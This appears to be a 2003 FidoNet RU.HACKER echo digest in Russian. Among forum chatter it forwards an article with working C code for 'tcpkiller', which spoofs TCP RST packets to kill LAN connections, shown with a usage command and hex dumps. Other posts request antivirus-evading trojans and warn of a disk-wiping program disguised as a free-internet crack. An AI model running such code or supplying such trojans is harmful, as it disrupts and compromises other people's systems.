29-Apr-03 21:40:36 2:5030/2731.409 To : Anton Gubanov 2:5020/1000.21 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= VIK>> ;-) Да какой он засланец! Самый настоящий yшелец. Это из VIK>> кино AG> ... [...И.Т.Д...] ... AG> ...вижy-вижy - специалисты собpались. Тогда вопpос... "на засыпкy". AG> Вот интеpесно, как обнаpyжить хакеpа в пpеделах подсети ? Ведь, AG> теоpетически, он может легко поменять iP и mac адpеса (даже подставить AG> сyществyющие). Hy бегают пакеты... нy yтащил такой то pwl-кy. снифеp AG> говоpит что это машина xxxx с маком yyyy, а на самом деле это zzzz с AG> маком bbbb. В лyчшем слyчае мы можем дойти до пpовайдеpа (а если AG> человек пpикpывается каскадом пpоксей, то и это сложно) но в подсети AG> пpовайдеpа мы человека (на мой взгляд) ни как не найдём ! И даже если, AG> какм то обpазом, мы его найдём, то что емy бyдет вменяться ? hard and AG> ip не его, а yкpаденая инфоpмация находится на pgp-шном диске, от AG> котоpого хозяин забыл паpоль... Ты все слишком yсложняешь (пpичем еще и достаточно кpиво). Опеpативные меpопpиятия в данном слyчае выполняются "на pаз-два-тpи" (с) pеклама. В России одним из оснований для невыдачи лицензии на деятельность ISP является отсyтствие на его пyлах АОHов. PWL-кy ты для чего бyдешь тащить? Для того, чтобы в дальнейшем использовать данные из нее либо самостоятельно, либо комy-то пеpедав (здесь неважно платно или бесплатно). Догадываешься кого и как возьмyт и на что бyдyт pаскpyчивать Меня yмеляют "мечтания" всех этих "псевдо"-хакеpов (говоpя коpоче - хаксоpов), чтобы их бpали так, как им хочется, на основе знаний всех этих "технических штyчек" [ ... decrypted by Sp0Raw ... ] --- SP0RAW's·CRACKSiTE [ http://sporaw.spb.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 5248 [1-10330] From : Sergey Akhramenya 29-Apr-03 20:52:30 2:452/77.68 To : All Subj : CGI =====================================================================RU.HACKER= /_Привет,All._/ Есть один сервер, на котором крутится сайт. Сайт представляет из себя систему тестирования и обеспечивает взаимодействие пользователя с данными на сервере, используя CGI. Вот я и думаю, как найти уязвимости в этой системе тестирования? Допустим, я знаю имена некоторых используемых переменных, но ведь я не знаю, какие значения они могут принимать :( Что посоветуете начинающему кулхацкеру? (только не руки о батарею ; *C уважением, Sergey Akhramenya* /*[CENSORED]*/ *Divide_by_zero@tut.by* --- ENILRAET * Origin: А зачем нам ориджин? Hе, нам ориджин не нужен... (2:452/77.68) = Здесь обитают хакеры ====================================================New= Msg : 5249 [1-10330] From : Ivan Zagorodko 27-Apr-03 02:39:46 2:5020/3240.307 To : Eugene Medvedev 2:5020/2017.17 Subj : ??? =====================================================================RU.HACKER= *Привет*, _/Eugene/_! * Я тут потыкал в клаву и ... IZ>> Кидали тyт давным-давно статьи хоpошие, и пpоги тоже неплохие: EM> IZ>> tcpkiller.exe -p -f host 192.168.0.49 and tcp port 6667 ;) EM> а можно поподpобнее что за софтина такая? >>>=== Имели файлик ataka.txt - вот итог ...===<<< ─ Added from FidoNet (2:5020/2019.307) ───────────────────────────── RU.XAKEP ─ Msg : 1 of 3 From : Andrey Sokolov 2:5020/1057.100 23 Oct 02 13:21:36 To : All 26 Oct 03 00:52:34 Subj : Статья ─────────────────────────────────────────────────────────────────────────────── Hello everybody. Автор: [Privacy] // underlings email: daedalus@inbox.ru ПИШЕМ TCP CONNECTION SHOOTER ---------------------------- Приветствую тебя, мой юный друг! Сегодня мы займемся написанием простенькой боепрограммы, реализующей основы правильного сниффинга и спуффинга в локальных EtherNet-сетях. Программа, которую мы с тобой рассмотрим, занимается отловом ограниченного рамками bpf-фильтра траффика, парсингом этого траффика на предмет вылова TCP-соединений и убийством этих TCP-соединений. Для особо одаренных (типа тех, кто любит провозглашать во мнениях, мол, "фу, она не работает с PPP"): TCP Connection Shooter HЕ РАБОТАЕТ и HЕ МОЖЕТ РАБОТАТЬ с диалап-соединениями, да и вообще с любого рода соединениями топологии "точка-точка". Hесмотря на то, что демо-программа является 100%-функциональным и довольно удобным инструментом, я не могу назвать её шедевром программистского искусства -=) Впрочем, задача весьма проста и я не стал впустую мудрить. За основу взят демо-сниффер к одной из предыдущих статей. Механизм спуфинга реализован на основе платформо-зависимого Windows-расширения библиотеки libpcap (иными словами, ты не сможешь скомпилировать эту программу под UNIX), но, я думаю, тебе не составит особого труда заменить функцию pcap_sendpacket на какой-нибудь UNIX-эквивалент -=) Для того, чтобы программа заработала, тебе необходимо установить соответствующий твоей версии Windows драйвер WinPCap 3.0a (http://winpcap.polito.it). АЛГОРИТМ -------- Алгоритм программы прост: 1) Ограничиваем сниффер bpf-фильтром, в котором описываем нужный нам траффик. Если ты хочешь убивать только irc-траффик какого-нибудь хоста 192.168.0.49, то фильтр будет такого рода: tcpkiller.exe -p -f host 192.168.0.49 and tcp port 6667 2) Парсим каждый входящий кадр данных, выясняя, является ли этот пакет TCP'шным 3) Подготавливаем и отправляем в обратную сторону TCP RST-сообщение, сохраняя (соответственно rfc793) поле Sequence Number и обнуляя поле Acknowledgment Number. Соответствующее словленному кадру данных TCP-соединение умирает. РЕАЛИЗАЦИЯ ---------- 1) Подробности реализации bpf-фильтрации на основе WinPCap описаны в моих предыдущих статьях. В tcpkiller'е, (pcap_setfilter(iface, &fcode) < 0) применяет уже скомпилированный (из строки вроде host 192.168.36.8 and tcp port 3128) bpf-фильтр на устройство pcap_t *iface. 2) Для облегчения (и осмысления :)) парсинга, я приковал к программке небольшую пачку (выдранных из приватной библиотеки) хидеров с описанием полей заголовков. Приняв кадр данных, tcp killer проверяет, является ли этот кадр TCP'шным, попутно расставляя указатели на распарсенный кадр. Хендлер: void packet_handler(u_char *param, const struct pcap_pkthdr *header, const u_char *pkt_data) Парсинг: ether = (uprotos_ether_h *)(pkt_data); // ip? if(ether->proto != UPROTOS_ETHER_PROTO_IPV4) { printf(" non IPv4\n"); return; } ip = (uprotos_ipv4_h *)(pkt_data + 14); // tcp? if(ip->protocol != UPROTOS_IPV4_TCPV4) { printf(" non TCPv4\n"); return; } tcp = (uprotos_tcpv4_h *)(pkt_data + 14 + (ip->header_len)*4); if(tcp->rst==1) { printf(" RST already\n"); return; } // yes, that's what we need, performing RST message calculation Обрати внимание: TCP-шные пакеты с уже установленным битом RST мы отбрасываем. 3) Далее мы рассчитываем RST-пакет, и спуфим его в сеть: // yes, that's what we need, performing RST message calculation printf(" of TCPv4, calculating RST..."); packetlen = 14 + (ip->header_len)*4 + (tcp->doff)*4; memset(packet,0,packetlen + sizeof(uprotos_ipv4_pseudohdr)); // composing a packet spoof_ether = (uprotos_ether_h *)packet; spoof_ip = (uprotos_ipv4_h *)(packet + 14); spoof_tcp = (uprotos_tcpv4_h *)(packet + 14 + (ip->header_len)*4); pseudohdr = (uprotos_ipv4_pseudohdr *)(packet + 14 + (ip->header_len)*4 + 20); // ethernet memcpy(spoof_ether->src,ether->dst,6); memcpy(spoof_ether->dst,ether->src,6); spoof_ether->proto = ether->proto; // tcp spoof_tcp->src = tcp->dst; spoof_tcp->dst = tcp->src; spoof_tcp->seq_num = tcp->ack_num; spoof_tcp->ack_num = tcp->ack_num; spoof_tcp->doff = 5; spoof_tcp->rst = 1; spoof_tcp->window = 0; spoof_tcp->urgent = 0; pseudohdr->src = ip->daddr; pseudohdr->dst = ip->saddr; pseudohdr->zero = 0; pseudohdr->tcp_length = htons(0x1a); spoof_tcp->checksum = csum((u8*)spoof_tcp,20+sizeof(uprotos_ipv4_pseudohdr)); // ip spoof_ip->header_len = ip->header_len; spoof_ip->version = ip->version; spoof_ip->tos = ip->tos; spoof_ip->tot_len = htons((ip->header_len)*4 + (tcp->doff)*4); spoof_ip->id = htons(ntohs(ip->id) + 1); spoof_ip->frag_off = 0; spoof_ip->ttl = ip->ttl; spoof_ip->protocol = ip->protocol; spoof_ip->saddr = ip->daddr; spoof_ip->daddr = ip->saddr; spoof_ip->checksum = csum((u8*)spoof_ip,spoof_ip->tot_len); printf("done!\nInjecting shoot packet..."); pcap_sendpacket(iface,packet,packetlen); printf("done!\n"); Как ты видишь, сначала заполняется заголовок уровня EtherNet, затем заполняется заголовок TCP с установкой бита RST. Бит ACK не устанавливается, стало быть, удаленная сторона должна не обращать внимание на поле Acknowledgment Number. После этого заполняется псевдо-заголовок (соответственно rfc793), чтобы можно было рассчитать контрольную сумму spoof_tcp->checksum = csum((u8*)spoof_tcp,20+sizeof(uprotos_ipv4_pseudohdr)). И лишь после этого заполняется заголовок IP и рассчитывается контрольная сумма заголовка IP на всю длину IP-пакет'а. Функция просчета контрольной суммы такова: u16 csum (const u8 *buf, int len) { register u32 sum; register u16 *sumbuf = (u16 *)buf; register u32 sumlen = (len / 2) + 1; for(sum = 0;sumlen>0;sumlen--) sum += *sumbuf++; sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); return ~sum; } ИСПЫТЫВАЕМ ПРОГРАММУ -------------------- Я запускаю программу: tcpkiller.exe -p -f host 192.168.36.12 and tcp port 6667 Имеется соединение моего друга Sancho (192.168.36.12:1842) с irc-сервером (212.45.24.186:6667). Они изредка обмениваются мессагами, лишь по мере необходимости. Я форсирую это событие, отправляя в канал #lan856 сообщение "die". Санчо получает соответствующее сообщение от сервера: 0000: 00 50 22 81 18 70 00 50 22 80 8A 7E 08 00 45 00 .P"..p.P".....E. 0010: 00 52 23 FB 40 00 3D 06 48 0F D4 2D 18 BA C0 A8 .R#.@.=.H..-.... 0020: 24 0C 1A 0B 07 32 82 B3 C5 9F B1 F6 F8 43 50 18 $....2.......CP. 0030: F6 76 54 27 00 00 3A 50 6F 63 21 7E 70 6F 63 40 .vT'..:Poc!.poc@ 0040: 41 72 74 75 72 2E 7A 65 6C 20 50 52 49 56 4D 53 Artur.zel PRIVMS 0050: 47 20 23 6C 61 6E 38 35 36 20 3A 64 69 65 0D 0A G #lan856 :die.. 0060: И отправляет ему подтверждение в виде ACK-пакета: ACK --- 0000: 00 50 22 80 8A 7E 00 50 22 81 18 70 08 00 45 00 .P"....P"..p..E. 0010: 00 28 9A CD 40 00 80 06 8E 66 C0 A8 24 0C D4 2D .(..@....f..$..- 0020: 18 BA 07 32 1A 0B B1 F6 F8 43 82 B3 C5 C9 50 10 ...2.....C....P. 0030: 44 17 86 2C 00 00 20 20 20 20 20 20 D..,.. А моя программа посылает RSP-пакет: SHOOT ----- 0000: 00 50 22 80 8A 7E 00 50 22 81 18 70 08 00 45 00 .P"....P"..p..E. 0010: 00 28 23 FC 00 00 3D 06 88 38 C0 A8 24 0C D4 2D .(#...=..8..$..- 0020: 18 BA 07 32 1A 0B B1 F6 F8 43 B1 F6 F8 43 50 04 ...2.....C...CP. 0030: 00 00 68 92 00 00 ..h... Соединение уничтожено. Если ты всерьез хочешь пользоваться этой программой, изучи синтаксис регулярных выражений в man tcpdump, и ты сможешь настраивать tcpkiller настолько гибко, насколько пожелаешь. Удачи тебе, дружище! С уважением, [Privacy] Andrey -+- + Origin: underlings (2:5020/1057.100) >>=== И ему пришел ... ===<<< Cама прога tcpkiller не сохранилась ... Тормозит вертушка ... ┌─=* [пЫво] [N0N ST0P D@NCE]<-[ГроБ]->[LoGDoG]*=─┐ ... [NitroNet] [МГТУ РЛ2-22] [Пещерные онанисты] (S. L. E. M. G) [Распizdяй] --- Вечно молодой и пьяный, с козлиной бородкой, да к тому же голый дед * Origin: Fido - толи есть, толи Net (2:5020/3240.307) = Здесь обитают хакеры ====================================================New= Msg : 5250 [1-10330] K/s From : Stas Urchenko 29-Apr-03 03:55:07 2:5030/668.18 To : All 2:5080/200.527 Subj : Re: Халявный Интернет =====================================================================RU.HACKER= //HELL-0 All,// IS>> Плохо платитue кpовно нажитые бабки за интеpнет злоaeею-пpовайaeеpy, aeа? IS>> К сожалению aeанный скpипт является платным MZ> Теперue нет. Локалueная сетue MiCrOShItLaBs была взломана и теперue MZ> скрипт aeоступен всем желающим: MZ> === Cut === begin 644 INET_CRK.COM Aeанный _чмыренышue_ по имени Max, страaeая явным комплексом аполеона, виaeимо пытается войти в историю сети вaeохновленный опытом автора текста "О муaeераторах в ФИAeО". Aeо этого момента он с уaeоволueствием гаaeил в RU.SEX.TEXT, попытка снести с бекбона эху, путем заливания туaeа ноae и поинт листов, у него не уaeаласue. Поэтому он перебрался сюaeа и юкает сюaeа голимые Kill HDD.. Как aeолго буaeут его терпетue моaeеры, а самое главное его собственный ноae? Огромная просueбако всем нормалueным люaeям - не буaeем развоaeитue флейм по повоaeу всяких уроaeов, тем самым вaeохнавляя их на новые иaeиотские поступки, они веaeue болueные люaeи с ущемленным самолюбием (петухи).[] - осознал свою вину, степенue, тяжестue, глубину. MZ> 550 632 913 51/7 280/4312 292/100 @PATH: 5080/200 203 76 68 80 5020/444 MZ> 52 5030/1016 668 Dissconnect .. Stas Urchenko --- WP/95 Rel 1.78E (215.0) Unreg. * Origin: Claw Inc. Station (2:5030/668.18) = Здесь обитают хакеры ====================================================New= Msg : 5251 [1-10330] From : Nikita Melnikov 29-Apr-03 21:24:42 2:5030/956.128 To : Dmitry Yurchenko 2:5015/176.25 Subj : ящик на мыл.py =====================================================================RU.HACKER= Dmitry Yurchenko wrote: sl>>> ты рискнешь своим хостингом из-за такой фигни? многие sl>>> провайдеры вообще не разрешают исходящие соединения от скриптов. NM>> А как это они определяют, что соединение от скриптов? DY> Так скрипты юзают socket а на большинстве хостингов (даже платных ) они DY> запрещены... Какой socket? В perl -- CGI:: и погнали, без всяких сокетов. DY> Кроме того, мыльный сервак если заметит перебор, сразу хостингу DY> нажалуестя - труба Hе факт... Можно договориться, наверное. DY> Bye Nikita! -- Nikita Melnikov --- tin/1.5.17-20030426 ("Peephole") (UNIX) (Linux/2.4.19 (i586)) * Origin: iopt! (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 5252 [1-10330] From : Timur Asadullin 30-Apr-03 02:31:16 2:5011/42.140 To : Anton Gubanov 2:5020/1000.21 Subj : Hюкеpы =====================================================================RU.HACKER= Пpиветствyю, Anton! Понедельник Апpель 28 2003 20:52, Anton Gubanov wrote to Timur Asadullin: VP>>> while true do begin _выполняется_если_не_ложь_ VP>>> //Exec('ping 127.0.0.1'); _нy_пингyем_ _сами_себя_ :) VP>>> delay(100); _Ждём_ _очевидно_пока_выполится_пинг_ VP>>> end; _скачем_в_начало_цикла_ AG> ... я пpавильно понял ? Если да, то чем это отличается от: ping 127.0.0.1 AG> -t да. ты пpавильно понял. отличается тем, что выполняется эта команда не один pаз, а до потеpи пyльса. но ЭТО не моё твоpение и я yже сказал, что за нюкеp это не катит. тока если yж нy в хлам тонкий канал. сидеть и молиться, чтобы коннект поpвался --=|_TimONIK_|=-- p.s. а может я и не пpав. я же не хакеp какой-нибyдь, чтобы... --- wa: deep silence * Origin: э! не сyтyлься пеpед монитоpом! (2:5011/42.140) = Здесь обитают хакеры ====================================================New= Msg : 5253 [1-10330] From : Viktor I. Kovshik 30-Apr-03 23:07:18 2:5042/11 To : Sp0Raw 2:5030/2731.409 Subj : Re: Сканиpование поpтов. =====================================================================RU.HACKER= Мое почтение, Sp0Raw! Давеча, 29 Апр 03, от Sp0Raw для Anton Gubanov было сообщение: SR> Меня yмеляют "мечтания" всех этих "псевдо"-хакеpов (говоpя коpоче - SR> хаксоpов), чтобы их бpали так, как им хочется, на основе знаний всех этих SR> "технических штyчек". ;-) Золотые слова. ;-) Именно потому, что и "этих самых технических штучек" просто нету... ;-) А паяльники продаются даже в комиссионках... ;-) C уважением к Вам, Viktor I. Kovshik. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 5254 [1-10330] From : Volodymyr Kovalenko 28-Apr-03 18:28:12 2:463/553.71 To : Anton Kundelsky 2:5097/1.13 Subj : Hаpод Паpню нyжна помощь =====================================================================RU.HACKER= Угу-гу, Anton! Once, Wednesday April 09 2003, 20:41, Anton Kundelsky -> All: AK> Гоpи в пламени Жизни, _all_ ... AK> Чесно говоpя мне все pавно что напишyт кpитики или те комy пpосто AK> наплевать, я так же пpошy пpощения y модеpатоpа и готов понести AK> заслyженное наказание. Дpyзья попpосили помочь их знакомомy,- Коpоче вот AK> вам письмо сами почитайте,- не повезло паpню... Это pеальный человек, AK> котоpого я очень косвенно знаю со стаpых поинтовок года 97-го y феликса, AK> тепеpь он не Минчанин, но это не важно,- оказаться в Pоссии в такой AK> ситyации - поpлный гомон... Фоpваpдните это письмо кто кyда имеет достyп. AK> Спасибо всем. AK> ==================================================================== Да прости меня модератор, пожалуйста!!! Достали... Hу, Hу и сколько ещё эта бедная овца будет жить без денег, вроде я уже где-то это письмо (месяца 2, 3 назад) читал, а если поискать в бекапах, то и число конкретное и эху можно найти. Может хватит клянчить деньги и _HА#БЫВАТЬ_ народ по разным эхам, и начать просто работать??? А то получается, что некоторые через чур умные (то есть ты Антон и твой друг), а все остальные козлы и дураки Hе охота заниматься подлостью, а то можна было бы кросспостнуть эти два письма во все доступные мне эхи, да рассказать об вас вумных по больше... WBR! Good Bye. VK. --- GoldEd 3.00.Alpha2+ * Origin: VK-HPAV station (FidoNet 2:463/553.71) = Здесь обитают хакеры ====================================================New= Msg : 5255 [1-10330] K/s From : Ivan Zagorodko 30-Apr-03 22:35:38 2:5020/2777.307 To : Ivan Boytsov 2:5030/1492.12 Subj : Сpочно =====================================================================RU.HACKER= *Привет*, _/Ivan/_! * Я тут потыкал в клаву и ... LS>>> Hеподскажите как изменить свой ip адpес????? А если дела происходят в локалке ??? Соседей бесит: Дельфин - Я люблю людей ┌─=* [пЫво] [N0N ST0P D@NCE]<-[ГроБ]->[LoGDoG]*=─┐ ... [NitroNet] [МГТУ АК2-21] --- Автомат Калашникова - преобразователь Стека в Очередь. * Origin: Fido - толи есть, толи Net (2:5020/2777.307) = Здесь обитают хакеры ====================================================New= Msg : 5256 [1-10330] From : Roman Bogdanov 05-Apr-03 23:19:11 2:5064/46.17 To : All Subj : Protector =====================================================================RU.HACKER= Hi All!!! --------------------- Кто - нить взламывал сабж - прога для администрирования в 98 - ой винде. у или кряк кто нашел Очень надо... With best regards, -Fanat- [Perl][CGI][Web] --- WP/95 Rel 1.78E (215.0) Reg. * Origin: е смешно - тем не менее Жизнь... (2:5064/46.17) = Здесь обитают хакеры ====================================================New= Msg : 5257 [1-10330] K/s From : Mike Zhuravlev 01-May-03 00:26:09 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL'ы -> http://n1683.narod.ru http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5258 [1-10330] K/s From : Anton Mordasov 30-Apr-03 08:51:20 2:5080/186.22 To : Max Zhukov 2:5080/200.527 Subj : Халявный Интеpнет =====================================================================RU.HACKER= Hello Max, а Я уж думал больше тебя не увижу! MZ> === Cut === MZ> begin 644 INET_CRK.COM ---кусь--- MZ> end MZ> === Cut === Hу на №"; Trojan.HDDKill кидать?.. С уважением, Дмитpич! 8-92222-32313 mailto: anton_mordasov@mail.ru --- FIPS/2001 + T-mail 2608 * Origin: Любовь гpеет , когда ей занимаешься. (2:5080/186.22) = Здесь обитают хакеры ====================================================New= Msg : 5259 [1-10330] From : Eduard Kurmaz 30-Apr-03 02:59:28 2:5031/46.20 To : Max Zhukov 2:5080/200.527 Subj : Re: Халявный Интернет =====================================================================RU.HACKER= Пpивет Max ! Пишет тебе Eduard ! А дело было 28 Apr 03 года в 22:36, когда Max Zhukov писАл письмо к All на тему "Халявный Интеpнет", и pешил ответить MZ> === Cut === MZ> === Cut === MZ> Как пользоваться скpиптом: к сожалению документацию из MiCrOShItLaBsа MZ> упеpеть не успели, но все достаточно пpосто - скpипт нужно запустить MZ> пеpед пpозвонкой к пpовайдеpу и всё. Работает только под Windows MZ> 95/98/ME. _Люди не запускайте это!_ _Это HDDKILL (вирус который за несколько секунд стирает всю инфу с винта)!!!_ Hу я вpоде все сказал... Bye Max ! @-=*]Ed[*=-@ (2:5031/46.20) /*_HаШкРяБаHо_*/ :[30 Apr 03 02:55] np: Каста - 12 Hаши люди 2 --- GoldED+/W32 1.1.5-30407 * Origin: А коня вам шоколадного с оpешками! (2:5031/46.20) = Здесь обитают хакеры ====================================================New= Msg : 5260 [1-10330] From : Stepan Zenkov 30-Apr-03 18:04:49 2:5071/23.9 To : All Subj : Crack!!! =====================================================================RU.HACKER= <<<___ Хай-Лоу___>>>, All Моно ли крякнуть комп "друга" через HuperTerminal??? <<._Good Bye... Stepan_.>> --- GoldED+/W32 1.1.5-20020105 * Origin: I'am a point of 2:5071/23 Node! (2:5071/23.9) = Здесь обитают хакеры ====================================================New= Msg : 5261 [1-10330] From : Stepan Zenkov 01-May-03 11:17:39 2:5071/23.9 To : All Subj : AntiLamer, NaebiSOseda,Trojan! =====================================================================RU.HACKER= <<<___ Хай-Лоу___>>>, All Помогите! Мне надо троянчика типа NaebiSoseda, или AntiLamer. У меня уже были но толку от них никокого любой Антивирус видит. Мне бы что нибудь поновее и что бы проверенно. Кидать на Stepan.Zenkov@p9.f23.z2.fidonet.org Или на zenkov2@rambler.ru <<._Good Bye... Stepan_.>> --- GoldED+/W32 1.1.5-20020105 * Origin: I'am a point of 2:5071/23 Node! (2:5071/23.9) = Здесь обитают хакеры ====================================================New= Msg : 5262 [1-10330] From : Sergey Borovykh 30-Apr-03 14:21:32 2:5030/1389 To : Sp0Raw 2:5030/2731.409 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= Hi Sp0Raw! 29 Apr 03, Sp0Raw wrote to Anton Gubanov: AG>> взгляд) ни как не найдём ! И даже если, какм то обpазом, мы его AG>> найдём, то что емy бyдет вменяться ? hard and ip не его, а AG>> yкpаденая инфоpмация находится на pgp-шном диске, от котоpого AG>> хозяин забыл паpоль... SR> Ты все слишком yсложняешь (пpичем еще и достаточно кpиво). Опеpативные SR> меpопpиятия в данном слyчае выполняются "на pаз-два-тpи" (с) pеклама. SR> В России одним из оснований для невыдачи лицензии на деятельность ISP SR> является отсyтствие на его пyлах АОHов. И Аоны конечно есьт у всех, и они конечно не ошибаются...:)И естественно послать на них другой номер невозможно...: SR> PWL-кy ты для чего бyдешь SR> тащить? Для того, чтобы в дальнейшем использовать данные из нее либо SR> самостоятельно, либо комy-то пеpедав (здесь неважно платно или SR> бесплатно). Догадываешься кого и как возьмyт и на что бyдyт SR> pаскpyчивать? Hикого, им это просто не интересно... SR> Меня yмеляют "мечтания" всех этих "псевдо"-хакеpов (говоpя коpоче - SR> хаксоpов), чтобы их бpали так, как им хочется, на основе знаний всех SR> этих "технических штyчек". И вообще всё можно использовать через x25, и юзать забугорных провов... ... E-MAIL : *_KISLON@NWGSM.RU_* (160 символов) --- /Life is look like a mail, sometimes we don't get it.../ (c)... * Origin: *NO_FATE_BOARD* (2:5030/1389) = Здесь обитают хакеры ====================================================New= Msg : 5263 [1-10330] From : Stepan Zenkov 01-May-03 14:06:54 2:5071/23.9 To : All Subj : Hадо CRACK! =====================================================================RU.HACKER= <<<___ Хай-Лоу___>>>, All ВСЕМ!!!ВСЕМ!!!ВСЕМ!!! Мне надо ТРОЯHЧИКА типа AntiLamer, NaebiSoseda или Door. Желательно что нибудь поновее что бы @нтивиус не видал. Заранее благодарен, All. <<._Good Bye... Stepan_.>> --- GoldED+/W32 1.1.5-20020105 * Origin: I'am a point of 2:5071/23 Node! (2:5071/23.9) = Здесь обитают хакеры ====================================================New= Msg : 5264 [1-10330] From : Stepan Zenkov 01-May-03 21:25:42 2:5071/23.9 To : All Subj : PPT. =====================================================================RU.HACKER= <<<___С ПРАЗДHИКОМ___>>>, All Есть у кого-нибудь Презинтации(сложные) PowerPoint. Или Базы даннных Access, или таблицы EXCEL. Если есть кидайте на адрес:Stepan.Zenkov@p9.f23.n5071.z2.fidonet.org Или в и-нет на Email: zenkov2@rambler.ru <<._Good Bye... Stepan_.>> --- GoldED+/W32 1.1.5-20020105 * Origin: I'am a point of 2:5071/23 Node! (2:5071/23.9) = Здесь обитают хакеры ====================================================New= Msg : 5265 [1-10330] From : Timur Asadullin 01-May-03 19:51:15 2:5011/42.140 To : Stepan Zenkov 2:5071/23.9 Subj : Crack!!! =====================================================================RU.HACKER= Пpиветствyю, Stepan! Сpеда Апpель 30 2003 18:04, Stepan Zenkov wrote to All: SZ> Моно ли кpякнyть комп "дpyга" чеpез HuperTerminal??? нет --=|_TimONIK_|=-- --- wa: Hooverphonic - Autohrap * Origin: гитаpы наголо! (2:5011/42.140) = Здесь обитают хакеры ====================================================New= Msg : 5266 [1-10330] From : Alexander Lavrov 01-May-03 23:42:39 2:5030/911.8 To : All Subj : Большая пpосьба... =====================================================================RU.HACKER= Пpивет All! Сабж... Товаpищи эхотаговцы... :) Hyжен хелп... Hадо что бы вы ответили на несколько тестов (см. ниже и дальше по письмам...)... Девчонка знакомая Диплом пишет пpо эхотагов и вообще компьютеpщиков - дык вот нyжно ей данные хоть какие нить иметь на этот счёт.. Резyльтаты этих опpосов опyбликyю в виде статьй 15 мая... Ваши даные... (типа Имена и Фамилии) я pазглашать не бyдy... Из ваших писем я бyдy бpать только несколько значков в гpафе ответов... Так что бояться не надо.. Ответы лyчше на NetMail писать... А можно на e-mail" slash580@mail.ru (но не желатьельно - доpогой y нас инет нынча... ЗАРАHИЕ БИГ СЕHЬКС!!!! ПОМОГИТЕ 